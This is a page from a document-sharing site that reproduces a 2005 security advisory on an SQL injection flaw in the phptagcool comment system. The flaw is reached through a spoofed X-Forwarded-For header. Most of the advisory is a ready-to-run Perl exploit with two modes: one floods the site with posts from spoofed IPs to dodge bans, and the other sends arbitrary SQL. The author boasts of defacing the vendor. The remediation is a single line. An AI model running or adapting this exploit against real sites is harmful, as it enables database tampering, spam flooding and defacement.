Php Tag Cool Sql Injection

  • October 2019
  • PDF
Download

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA

Overview

Download & View Php Tag Cool Sql Injection as PDF for free.

More details

  • Words: 587
  • Pages: 4
##################################################################### advisory #2 "phptagcool sql injection" $ author: megabyte $ contact: [email protected] [email protected] [email protected] $ date: aug 24 2005 $ website: http://mbytesecurity.org $ risk: high $ vendor url: http://crashcool.com $ affected software: phptagcool v1.0.3 $greetz pandora te amo bb, rootbox for discovering the forwarded-for issue ##################################################################### -= description =phptagcool is an online tag system for leaving your comments ---------------------------------------------------------------------------= vulnerabilities =- | "sql inyection" | the phptagcool software allows to inject sql code spoofing the x-forwarded-for header here its the vulnerable portion of the code in post.php ___________________________________________________________________________ #sacar ip if (isset($_server['http_x_forwarded_for'])) { $ip = $_server['http_x_forwarded_for']; } elseif (isset($_server['http_via'])) { $ip = $_server['http_via']; }elseif (isset($_server['remote_addr'])) { $ip = $_server['remote_addr']; } else { $ip = "x.x.x.x"; } #comprobamos si el user esta baneado #conectamos con la db $conexion=mysql_connect($host,$usuario,$contrasenya); #seleccionamos la db mysql_select_db($base,$conexion); $consulta2=mysql_query("select * from $t_ban where ip='$ip'" ,$conexion); ____________________________________________________________________________ so if we fake the x-forwarded-for with our own value,instead of the ip address we can inject sql code $consulta2=mysql_query("select * from $t_ban where ip='here i can inject'"

,$conexion);

- | exploit | you can use any man in the middle software to intercept and edit the http headers such as achilles. but here its the exploit that allows 2 type of attacks,flood and sql injection #!/usr/bin/perl ## phptagcool zatueritor 1.0 ## copyright: megabyte www.mbytesecurity.org ## greetz: rootbox for discovering the forwarded-for issue ## te amo pandora ## crashcool,fuiste defaceado por un bug de tu propia programacion,ahora que inventaras? use io::socket; $x = 0; print q( phptagcool zatueritor 1.0 by megabyte ); print q(host |sin http://www.| ); $host = <stdin>; chop ($host); print q(ruta |ejemplo. /phptagcool/ o /| ); $pth = <stdin>; chop ($pth); print q(tipo de atake |1 = posteo masivo, 2 = injeccion sql| ); $type = <stdin>; chop ($type); ## the flood attack if($type == 1){ while($x != 255) { $nick = "nick=megabyte"; ## we generate our own ip address so we won't be banned :) $ip = "127.0.0" . "$x"; $postit = "$nick"."&url=http%3a%2f%2fwww.mbytesecurity.org&mensaje=floodinglametag&submit=en viar";

$lrg = length $postit; my $sock = new io::socket::inet ( peeraddr => "$host", peerport => "80", proto => "tcp", ); die "\nno se pudo conectar :( $!\n" unless $sock; ## we fake the x-forwarded-for header,so we can post with multiple ip's print $sock "post $pth"."mensajes.php http/1.1\n"; print $sock "host: $host\n"; print $sock "accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.mspowerpoint, application/msword, */*\n"; print $sock "referer: $host\n"; print $sock "accept-language: en-us\n"; print $sock "content-type: application/x-www-form-urlencoded\n"; print $sock "accept-encoding: gzip, deflate\n"; print $sock "user-agent: mozilla/5.0 (beos; u; beos x.6; en-us; rv:1.7.8) gecko/20050511 firefox/1.0.4\n"; print $sock "x-forwarded-for: $ip\n"; print $sock "connection: keep-alive\n"; print $sock "cache-control: no-cache\n"; print $sock "content-length: $lrg\n\n"; print $sock "$postit\n"; close($sock); syswrite stdout, "."; $x++; } ## the sql injection attack :) } elsif ($type == 2){ print q(inyeccion a ejecutar ejemplo |myip,some sql here| ); $sql = <stdin>; chop ($sql);

my $sock = new io::socket::inet (

peeraddr => "$host", peerport => "80", proto => "tcp", ); die "\nno se pudo conectar :( $!\n" unless $sock; print $sock "post $pth"."mensajes.php http/1.1\n"; print $sock "host: $host\n"; print $sock "accept:

text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,im age/png,*/*;q=0.5\n"; print $sock "referer: $host\n"; print $sock "accept-language: en-us\n"; print $sock "content-type: application/x-www-form-urlencoded\n"; print $sock "accept-encoding: gzip, deflate\n"; print $sock "user-agent: mozilla/5.0 (beos; u; beos x.6; en-us; rv:1.7.8) gecko/20050511 firefox/1.0.4\n"; print $sock "connection: keep-alive\n"; print $sock "cache-control: no-cache\n"; print $sock "content-length: $lrg\n\n"; print $sock "x-forwarded-for: $sql\n"; close($sock); }else{ die "solo hay 2 opciones imbecil\n"; } ------------------------------------------------------= how to fix =filter the http_x_forwarded_for -= contact =megabyte http://mbytesecurity.org el dios de la red saludos a pandora mi bb zeus,cairo,redpoint,x0p0x and all lame band

Related Documents

Php Tag Cool Sql Injection
October 2019 4
Sql Injection
November 2019 113
Sql Injection
May 2020 49
Sql Injection
November 2019 71
Sql Injection
November 2019 61
Sql Injection - Practically Detailed
May 2020 28

Copyright © 2024 PDFCOKE.